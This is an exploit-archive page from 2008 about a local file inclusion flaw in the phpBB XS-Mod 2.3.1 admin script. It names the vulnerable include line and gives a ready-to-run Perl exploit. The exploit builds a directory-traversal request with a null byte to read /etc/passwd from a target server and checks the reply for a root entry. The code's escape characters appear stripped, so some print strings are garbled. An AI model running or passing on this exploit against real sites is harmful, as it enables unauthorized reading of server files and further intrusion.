[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpBB Module XS-Mod 2.3.1 Local File Inclusion Vulnerability
# Published : 2008-03-24
# Author : bd0rk
# Previous Title : TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability
# Next Title : PowerBook 1.21 (index.php page) Local File Inclusion Vulnerability
..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
.%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
.....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
.................................................................
[+] Software: phpBB Module XS 2.3.1
[+] Vendor: http://www.phpbbmods.de
[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3
[~] Vulnerability found by: bd0rk
[~] Contact: bd0rk[at]hackermail.com
[~] Website: http://www.soh-crew.it.tt
[~] Greetings: str0ke, TheJT, maria
[+] Vulnerable Code in /admin/admin_xs.php line 33
[+] Code: include_once('xs_include.' . $phpEx);
[+] It is a local file inclusion
[+]Exploitcode:
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
print "tt+++++++++++++++++++++++++++++++++++++++++++++++++++nn";
print "tt+ +nn";
print "tt+ phpBB Module XS 2.3.1 Local File Inclusion Expl +nn";
print "tt+ +nn";
print "tt+++++++++++++++++++++++++++++++++++++++++++++++++++nn";
if (!$ARGV[0])
{
print "Usage: expl.pl [target]n";
print "Example: expl.pl http://127.0.0.1/directory/admin/n";
}
else
{
$web=$ARGV[0];
chomp $web;
$file="admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc/passwd%00";
my $web1=$web.$file;
print "$web1nn";
my $agent = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $agent->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "This is vulnerablen";
}
else
{
print "It is not vulnerablen";
}
}
# www.Syue.com [2008-03-24]